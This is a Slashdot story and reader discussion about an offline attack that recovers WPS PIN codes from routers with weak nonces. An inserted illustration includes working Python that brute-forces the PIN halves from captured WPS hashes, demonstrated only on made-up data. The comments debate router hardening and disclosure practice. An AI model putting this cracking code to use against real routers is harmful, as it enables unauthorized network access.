
Wi-Fi Router Attack Only Requires a Single PIN Guess

Posted by Soulskill
from the one-two-three-four dept.
An anonymous reader writes: New research shows that wireless routers are still quite vulnerable to attack if they don't use a good implementation of Wi-Fi Protected Setup. Bad implementations do a poor job of randomizing the key used to authenticate hardware PINs. Because of this, the new attack only requires a single guess at the hardware PIN to collect data necessary to break it. After a few hours to process the data, an attacker can access the router's WPS functionality. Two major router manufacturers are affected: Broadcom, and a manufacturer to be named once they get around to fixing it. "Because many router manufacturers use the reference software implementation as the basis for their customized router software, the problems affected the final products, Bongard said. Broadcom's reference implementation had poor randomization, while the second vendor used a special seed, or nonce, of zero, essentially eliminating any randomness."
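The offline check the summary describes, as an added illustration that is not part of the article, the submission, or Bongard's own tooling. In the WPS registration protocol the Enrollee's M3 message carries E-Hash1 and E-Hash2, each an HMAC-SHA256 under AuthKey over a secret 128-bit nonce (E-S1 or E-S2), the PSK derived from one half of the PIN, and the two Diffie-Hellman public keys PKE and PKR. An attacker acting as an external Registrar already knows AuthKey, PKE and PKR, so once the nonces are predictable the PIN halves can be searched locally instead of one online guess at a time. The block models the second vendor's "nonce of zero" case; AuthKey, PKE, PKR and the PIN 12345670 are constructed placeholders. For the Broadcom case the nonces come from a weak PRNG rather than being constant, so the attacker must also enumerate PRNG states (the "few hours" in the summary); that outer loop is not modelled here.

```python
"""Offline recovery of a WPS PIN from the M3 hashes when the Enrollee's
secret nonces E-S1/E-S2 are predictable (here: all zeros).

Added illustration, not code from the article or the research it
summarises.  Field layout follows the WPS spec:
  PSK1    = first 128 bits of HMAC-SHA256(AuthKey, ASCII first half of PIN)
  E-Hash1 = HMAC-SHA256(AuthKey, E-S1 || PSK1 || PKE || PKR)
AuthKey, PKE and PKR are constructed placeholder bytes; in a live
exchange the external Registrar derives them from the DH handshake.
"""
import hashlib
import hmac
import os


def wps_checksum(pin7: int) -> int:
    """Checksum digit for the first 7 digits of a WPS PIN (hostapd algorithm)."""
    accum = 0
    while pin7:
        accum += 3 * (pin7 % 10)
        pin7 //= 10
        accum += pin7 % 10
        pin7 //= 10
    return (10 - accum % 10) % 10


def valid_pin(pin: str) -> bool:
    return len(pin) == 8 and pin.isdigit() and wps_checksum(int(pin[:7])) == int(pin[7])


def psk(authkey: bytes, half: str) -> bytes:
    """PSK1/PSK2: first 128 bits of HMAC-SHA256 over one ASCII PIN half."""
    return hmac.new(authkey, half.encode(), hashlib.sha256).digest()[:16]


def e_hash(authkey: bytes, nonce: bytes, psk_half: bytes, pke: bytes, pkr: bytes) -> bytes:
    return hmac.new(authkey, nonce + psk_half + pke + pkr, hashlib.sha256).digest()


def enrollee_m3(authkey, pin, pke, pkr, es1, es2):
    """The E-Hash1/E-Hash2 pair an Enrollee puts in M3 for its two secret nonces."""
    return (e_hash(authkey, es1, psk(authkey, pin[:4]), pke, pkr),
            e_hash(authkey, es2, psk(authkey, pin[4:]), pke, pkr))


def recover_pin(authkey, pke, pkr, ehash1, ehash2, es1_guess, es2_guess):
    """Offline search with guessed nonces: 10^4 candidates for the first half,
    10^3 for the second (the 8th digit is fixed by the checksum).  Every
    candidate is checked locally; nothing is sent to the access point."""
    first = None
    for i in range(10_000):
        half = f"{i:04d}"
        if e_hash(authkey, es1_guess, psk(authkey, half), pke, pkr) == ehash1:
            first = half
            break
    if first is None:
        return None
    for j in range(1_000):
        half = f"{j:03d}"
        half += str(wps_checksum(int(first + half)))
        if e_hash(authkey, es2_guess, psk(authkey, half), pke, pkr) == ehash2:
            return first + half
    return None


def demo(weak_nonces: bool = True):
    """Constructed exchange with random AuthKey/PKE/PKR and PIN 12345670.

    weak_nonces=True models the vendor that seeds E-S1/E-S2 with zero;
    False models a correct Enrollee with fresh random nonces, against
    which the same zero guess recovers nothing."""
    authkey, pke, pkr = os.urandom(32), os.urandom(192), os.urandom(192)
    pin = "1234567" + str(wps_checksum(1234567))
    zero = bytes(16)  # the attacker's guess for both nonces
    es1, es2 = (zero, zero) if weak_nonces else (os.urandom(16), os.urandom(16))
    eh1, eh2 = enrollee_m3(authkey, pin, pke, pkr, es1, es2)
    return pin, recover_pin(authkey, pke, pkr, eh1, eh2, zero, zero)


if __name__ == "__main__":
    print("weak nonces:  ", demo(True))
    print("random nonces:", demo(False))
```

The point the summary makes is visible in the two `demo` calls: the protocol and the hash function are identical in both, and the only thing that turns 11,000 local HMACs into the PIN is the Enrollee's choice of nonce. The "single PIN guess" in the headline is the one M1-M3 exchange needed to collect E-Hash1/E-Hash2 and the public keys; everything after that is offline.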

  • WiFi Protected Setup shouldn't be used anyways for security, especially since its problems have already been mentioned many times already in quite a few articles.
    • by Anonymous Coward

      True, except every router maker uses it and almost all routers don't have the option to turn it off. I blame this on the business marketing department (i.e. whitey).

      • by afaiktoit (831835)
        And the ones you think you're turning it off on, it really isn't.
    • Re: (Score:1, Informative)

      by The Larch (115962)
      Thanks captain! This is real insightful! Also women should not wear dresses, and people should not buy consumer goods.
  • Wireless security (Score:5, Informative)

    by ledow (319597) on Saturday August 30, 2014 @07:08PM (#47792921) Homepage

    Is it just me that hates shit on my router?

    - WPS (a.k.a. turn your massive password into a four-digit number): turned off on every router I've ever used, since day one of installation.

    - UPnP (a.k.a. let anything open any port to anywhere without authentication): turned off on every router I've ever used, since day one of installation.

    - WPA/WEP (a.k.a. half-arsed encryption that we never really thought through): turned off on every router I've ever used, since day one of installation.

    - Guest networks (a.k.a. let random strangers use your Internet connection without you knowing): turned off on every router I've ever used, since day one of installation.

    - Remote administration (a.k.a. let random strangers on the Internet sit and brute-force your passwords with no way to tell it's happening): turned off on every router I've ever used, since day one of installation.

    And, in fact, on anything BUT my actual wireless router of choice (e.g. any Internet router supplied by my ISP):

    - wireless (a.k.a. give people another way into my network and hinder all my other - wanted - wifi connections by flooding the airwaves): turned off on every router I've ever used, since day one of installation.

    Seriously, people, just turn this shit off. And layer VPN over the top of it, if you can. Seriously. There's zero impact on always VPN'ing over your wireless connection to a machine that has a fixed line to your actual Internet connection. Then even if WPA2 is broken, you're still secure. And yes, you can game. I've done it with OpenVPN over my wireless for years - for EVERY packet - that goes over the wireless.

    Wireless is the leaky, draughty hole of your network. Seal that fucker up and treat it like an Internet connection, even to your local network.

    • Re:Wireless security (Score:5, Informative)

      by arbiter1 (1204146) on Saturday August 30, 2014 @07:52PM (#47793083)
      Sadly, some routers, even if you turn it off, it's not really off.
    • Re:Wireless security (Score:5, Interesting)

      by Anonymous Coward on Saturday August 30, 2014 @08:39PM (#47793253)

      Hah. You're stressing over every little thing.

      The part that really bothers me though is your turning off guest networks. I've always turned off the automatic kind (NAME OF ROUTER -GUEST NETWORK), but then gone on to set one up as a virtual access point properly on DD-WRT. At home and at work I've shared my internet connection with the apartment block across the street, the corrections institute, gay bar, fitness center and mortgage company and any random stranger that passes by. Even the homeless or just plain poor people.

      You know what I have learned? People aren't the pieces of shit that people like you think that they are.

      I've never seen a pedophile or a hacker. I've always monitored network traffic and I do keep logs. I've seen one or two people who look at porn and two fucking Rokus. (You can afford Netflix and you're using my connection across the street? wtf? Sorry about the stutters... durrr.) Out of hundreds of people I have found most people are pretty endearing and normal. Most people look at their Facebook, or they ask Google personal questions. Like where to find a job, or get a date, or how to solve/fix something. Or they research stuff. That's all.

      I'm probably giving internet access to some of the people that block my parking spot now that I think about it. *laughs*.

      in short, sharing has made things better for those around me and I haven't been harmed by it at all.

      captcha: bragged

      • Re:Wireless security (Score:5, Interesting)

        by Anonymous Coward on Saturday August 30, 2014 @10:39PM (#47793659)

        Ignore the hate man, keep doing what you're doing :) I'm the same, XXXX_ST_FREE_WIFI has been up most of the last 3 years, and similar at units before this. I set up an old wireless router and Raspberry Pi to provide an isolated network with an internet connection for anyone who wants to stop within range (the bus stop across the road is the main source of traffic).

        I have around 6 unique connections a day, and several regulars from the surrounding units or daily commute. I redirect "google.com*" to a local splash page (with the google search page in a frame below) that has a couple lines saying this is my personal connection, feel free to use but I'll shut down any time if I need the bandwidth, or think people are being suss. I highlight that it is essentially a public network, so advise against anything personal / private, so I think people assume they're being watched and stay on their best behaviour anyway :P

        I originally started with some strict firewall rules (port 80 / 443 outbound only), but found people just never tried anything else really. I think I've seen a couple dozen POP / IMAP requests which were probably from auto sync, and a couple of bittorrent users, but no one's ever tried to even probe at the guest network, let alone look for my (isolated) home network.

        I also have a file share that I let people dump to / from which I clear daily, and one that serves a bunch of free software and my local distro mirror. I've _never_ had anyone put anything I disapproved of on there. I've had a couple of people dump a movie or music on there, but I've removed and replaced it with a note saying that's not what it's for (in case they check back). Some others have started chats back and forth with simple text files; most people just posted pics with a thumbs up to say thank you :) (my suggestion in the landing page).

        All in all, it's been a great experience. I liken it to running a small social media site that's location based, rather than internet facing. I'm thinking of adding a persistent page with a guest book / wall, just to reach out a little more personally.

        Like you said, people aren't the pieces of shit people think. Those that are generally have shittier things to do than mess with a random wifi network.

        captcha: intercom

        • by Anonymous Coward

          It probably depends on the location. I wouldn't recommend doing that in the vicinity of a railway station or some other place with a lot of out-of-area people passing through (places that would also attract "real world" crime.) Anyways, kudos for sticking your head out.

      • you can afford netflix and you're using my connection across the street? wtf?

        Being able to afford Netflix ($120 per year) doesn't always imply being able to afford the inflated prices that cable providers charge for high-speed Internet access without a subscription to multichannel pay TV at the same address (often $700 or more per year).

      • But you don't get it, you're supposed to be afraid so that you feel better about buying whatever product the fear-mongers are selling. I have open Wi-Fi too. For fun I monitored it to see who was connecting and what type of traffic I'd get, but after a month or so I gave up because no-one connected to it. Even years later I've never gone over my quota so what do I care if someone gets some free internet?
    • Many devices don't support VPNs (Chromecast for example), and the ones that do don't usually have OpenVPN as a built-in option. Not to mention the increase in battery usage on mobile devices due to keepalives. This mostly restricts your wireless devices to laptops and select tablets or smartphones. If you really don't trust WPA then just make some LAN resources accessible by VPN only (over WPA), but allow internet access without it. Any sites with sensitive data should be using TLS anyway.

      Also, WPA2-Enterpr

      • by LiENUS (207736)

        not TTLS where you use a username/password combo (too easy for a MITM)

        TTLS properly configured is no easier to MITM than properly configured TLS, you should be using server cert validation with either.

        • The idea is defense in depth. If server cert validation fails for any reason and you're using passwords, the enemy learns all your secrets. With client certs your master secret remains safe even if a single session is compromised.
          • by LiENUS (207736)

            If server cert validation has failed chances are your CA was compromised, in which case the attacker could just generate client certs at will anyway....

            • by LiENUS (207736)

              Actually, for that matter, wouldn't a compromised server certificate leave you vulnerable to a proxy attack anyway, where you would use the compromised server cert to pretend to be the access point communicating with the proper RADIUS server, thus giving MITM on TLS or TTLS the same? You might not get the actual client cert on TLS but you would have their traffic all the same.

              • by David Jao (2759)
                Having all their traffic to and from one server is not as devastating an attack as having their password. For one thing, users tend to re-use passwords across multiple sites. I'm sure you can think of plenty of other reasons why client certs are at least *slightly* safer than username/passwords.
                • by LiENUS (207736)

                  Aha, so you missed the original quote, I'll try bolding the relevant parts this time.

                  Also, WPA2-Enterprise is pretty secure if you only use TLS auth, not TTLS where you use a username/password combo (too easy for a MITM)

                  I was specifically replying to that part, as TLS and TTLS both have the same degree of MITM vulnerability with properly configured clients.
                  If the server cert fails in TLS or TTLS then MITM is a possibility; you don't need the username/password or client cert to MITM a TLS connection, just the server cert.

                  • by David Jao (2759)
                    If you're using client certificates for authentication, and an attacker obtains the server cert, then the attacker can successfully fool you into thinking that you have connected to the real server, but the attacker cannot successfully fool the real server into thinking that you have connected to it. This kind of "half-MITM" attack is not usually thought of as a full MITM. The authentication protocol uses a challenge/response protocol which incorporates ephemeral keys and hence is not portable even between
        • I've actually found that a lot of devices just ignore an invalid (i.e. not from a trusted CA) certificate for this. Android in particular will happily continue with no prompt to the user that the cert is not trusted. I even had it somehow forget the CA that I specified with the network credentials. I'm not 100% certain on this, but I vaguely remember having an issue with NetworkManager also not validating the server certificate with TTLS.

          It's just too risky where a device could decide either for "convenience

    • by Anonymous Coward

      > - UPnP (a.k.a. let anything open any port to anywhere without authentication)

      miniupnpd (the UPnP daemon of choice for every router software I've been able to look at) has a configuration setting that only permits a machine to forward ports to itself. This configuration setting defaults to "on". This means that a LAN with a running miniupnpd is no less secure than a LAN with a globally-routable IPv6 address allocation.

      Additionally, on any non-shit router software (why would you advocate securing your L

    • by thegarbz (1787294)

      Errr, right. Your security theory boils down to: wireless has no physical barriers so we need to avoid it at all costs regardless of its benefits?

      No thanks. While I agree with some of your sentiment like WPS being a colossal piece of shit and remote admin just being a bad idea:

      - UPnP - I am not going to manually configure every internet facing service every time I want to use a piece of software.
      - WPA - While WEP is proven weak and breakable, WPA hasn't been broken without some serious conditions (knowing wh

      • UPnP - I am not going to manually configure every internet facing service every time I want to use a piece of software.

        In the era of IPv4 address exhaustion and IPv6 foot-dragging, more and more users end up behind carrier-grade NAT. To serve these users, more and more applications are being written to bounce traffic off a server so that the client can get away with making only outbound connections.

        • by thegarbz (1787294)

          That's great from an end user perspective, but then you're advocating applications tied to a specific internet service? I'm surprised you haven't been nodded into oblivion by the trust no corporation crowd on slashdot.

          But they definitely have a point. Connectivity between two clients should not depend on a third party server, especially since many of us not only have real IPs but static ones too.

          • by tepples (727027)
            I guess the reasoning is that people behind a static IP probably don't need UPnP. If you pay extra for a static IP, you're probably doing so because you have more computer networking knowledge than the average user of the WWW, and you can just use your Internet gateway's configuration panel to forward incoming port ranges to particular machines.
            • by thegarbz (1787294)

              The presence of a static IP address (which I get by signing up to the cheapest ISP in the country, not by paying extra) has nothing to do with not wanting to dedicate effort to manage a home network. It is not at all hard to open ports. You don't need to be some technical whiz, and while I am that whiz I have no interest in managing applications in my home network when a perfectly good system allows me to do it.

              As far as I am concerned my network is designed to be leaky. Internal applications should have co

    • by mlts (1038732)

      The ironic thing is that WPA2-PSK is decently secure. I've not read of any significant breaks, assuming the key is of a decent length.

      The problem is that there are shortcuts given (WPS) which make having a solid shared key pointless.

      UPnP? Just asking for trouble. If a game has to have ports open, I'll manually open them myself. Otherwise, they should remain closed.

      WEP? This shouldn't even be present in any router made in recent years. My HTC Wizard, circa 2006, had an application (before the word "app

      • by tepples (727027)

        If I want [remote administration] functionality, I'll have some sort of port knocking, a DMZ machine, and SSH with 2FA or via RSA keys to an inside machine to access the router.

        That's a lot of electric power to waste on leaving two computers on 24/7 just so that you can troubleshoot problems with a router belonging to a not-so-technically-inclined relative who lives far from you.

      • by mjwalshe (1680392)
        If I want remote admin I'll use a proper Cisco router with an out-of-band modem with call back, thank you very much.
    • by tlhIngan (30335)

      Well, it's to make life simpler for users.

      WPS - the alternative to this for "regular users" is no security. Great for those who need a hotspot in a hurry, not so great in general. Instead, all users need to do is hit a button and enter a code, and they have encrypted WiFi working. It's just like TouchID on the iPhone - Apple realized people should use passcodes for security, but many don't because it's )@*#&%*(@ annoying to enter it (especially if you have "complex passcodes" on) 1,000 times a day.

      WPA is st

    • You are trusting your ISP to deliver you a router that has all these things properly configurable and not leave back doors for their own remote admin and whatnot still open. ISPs don't do that, they always leave themselves a backdoor and often are lax in upgrading firmware. If at all possible, let your ISPs router do only the minimal required to let your network connect to the internet and do the rest (firewalling, NAT, WiFi) on your own trusted devices.
      • by ruir (2709173)
        Trust what? I disabled all the routing and wifi functions of my cable modem, only use the bridging mode and placed there my own.
    • I take it a step further, I buy appliances with exactly the feature set that I need. I admit it gets harder and harder. The usual dialogue in the store:

      "I want to buy a $device without $feature"
      "Sir, we'd have $device here, you can disable $feature in it"
      "Where? I don't see the switch to turn it off."
      "You can disable it in the configuration"
      "So... I can turn it off in the config and anyone who can get into the configuration page of the device can turn it back on?"
      "Umm... yeah, but you'd be the only one who

      • by Anonymous Coward on Sunday August 31, 2014 @03:37AM (#47794309)

        Let me get this straight: you refuse to buy a wireless router with WPS that can be disabled in the administration console for the router because if someone pwns your router administration console they might be able to turn WPS back on?

        Really? I bet you also refuse to use ATM cards because if someone stole your identity, got issued a fake driver's license, stole all your passwords, etc, they might be able to contact the bank and change your PIN!

    • WPA/WEP (a.k.a. half-arsed encryption that we never really thought through): turned off on every router I've ever used, since day one of installation.

      Was this true even during the days of Nintendo Wi-Fi Connection, when the Nintendo DS couldn't use anything but WEP? Or did you just skip the DS?

      Remote administration (a.k.a. let random strangers on the Internet sit and brute-force your passwords with no way to tell it's happening): turned off on every router I've ever used, since day one of installation.

      So when you're setting up a home network for a relative who lives far away and is not technically inclined, and you have to troubleshoot it, do you make plans to get on an airplane whenever something goes wrong?

      Seriously. There's zero impact on always VPN'ing over your wireless connection to a machine that has a fixed line to your actual Internet connection.

      Except on machines that do not support OpenVPN, such as a video game console.

    • by Anonymous Coward

      - networking (a.k.a. allow another computer to snoop into my hardware and software): turned off on every computer I ever used, since day one of installation.

    • by antdude (79039)

      Or better, don't use wireless at all!

  • by Anonymous Coward

    Rubbish.
    We want cheap devices, like printers. If we can talk to them via TCP/IP or even Wi-Fi this is a good thing(tm).
    In my case the printer was TCP/IP AND Wi-Fi but no display/menu to speak of.
    The one with a display would have printed the same quality but would have cost more.
    So how the Swiss cheese was I to set up the printer via Wi-Fi if I could not access it to set up the passphrase and IP address etc. etc.?
    Wi-Fi Protected Setup to the rescue.
    once it was paired to the router automagically i could access the pr

  • by Anonymous Coward

    well, you can always use Huawei routers, they are too cheap to follow standards (a.k.a. be vulnerable to wps)

  • ...a manufacturer to be named once they get around to fixing it...

    Someone got paid off not to name the manufacturer. Doing a great injustice to their customers by not letting them know their routers can easily be compromised.

    Sure, maybe not letting the criminals know which manufacturer might seem like a smart idea, but in the same process, they don't need to know; they can just start checking them all. Your customers aren't safe that way. At least if you tell them there is a problem, they can use secondary measures, like turning off their router when they aren't using it. Maybe change their password every hour or so, or maybe pay attention to anything connecting to it. At least that way you can do something about it.

    Going to boycott whichever manufacturer that is because they don't have my security in mind when they do stuff like this.

    • by roady (30728)

      Nobody got paid. We call this responsible disclosure. Only thing is the Broadcom flaw was found before the second flaw and so they had a heads up.

        http://en.wikipedia.org/wiki/R... [wikipedia.org]

      • It can also protect profits to make sure that the announcement of the vulnerability smears all vendors and thus includes your competitors tools, not merely your own company's flawed products. This is called "sponsoring more research before publication". I'm afraid that it's a noticeable source of funding for security researchers, and can also buy valuable time to sell off as much of the flawed inventory as possible while or until the fix is provided for newer products.

        I'm afraid that there are people who th

        • by roady (30728)

          So to be crystal clear, are you accusing me of being a liar and having accepted money from a vendor?

          • >> We call this responsible disclosure.

            > are you accusing me of being a liar

            I'd not done so. I don't discount responsible disclosure as existing: I'd certainly want to see a zero-day exploit reported to the authors, first, so that they can get a chance to publish a patch before the flaw spreads in the wild, and I _report_ flaws directly to vendors and authors when I encounter them.

            I've explained other, more selfish reasons that a vendor or a security researcher might decline to publish full detail

            • by roady (30728)

              I am the guy who did the research in this article actually.

              • Good for you, then, that you are doing real work in the field. I'll applaud your technical work in discovering and publishing this vulnerability, and I hope you'll feel able to publish more details ASAP.

                As you are actually doing security work I'll urge that you be aware of why and how people might use your practice of genuinely responsible disclosure against their own customers or clients. There often comes a time when you have to make choices about whistle-blowing: exposing the flaws more widely to force

  • I know for example that Apple uses broadcom chipsets and supports WPS (through Airport Utility) - are they vulnerable?

    A known list of vulnerable routers would be very interesting.

    • by roady (30728)

      Yes, of course, but it's unfortunately very complicated.

      1. Showing a router is vulnerable is easy. Proving one is not is hard.

      2. Buying and reversing each and every router is mighty expensive.
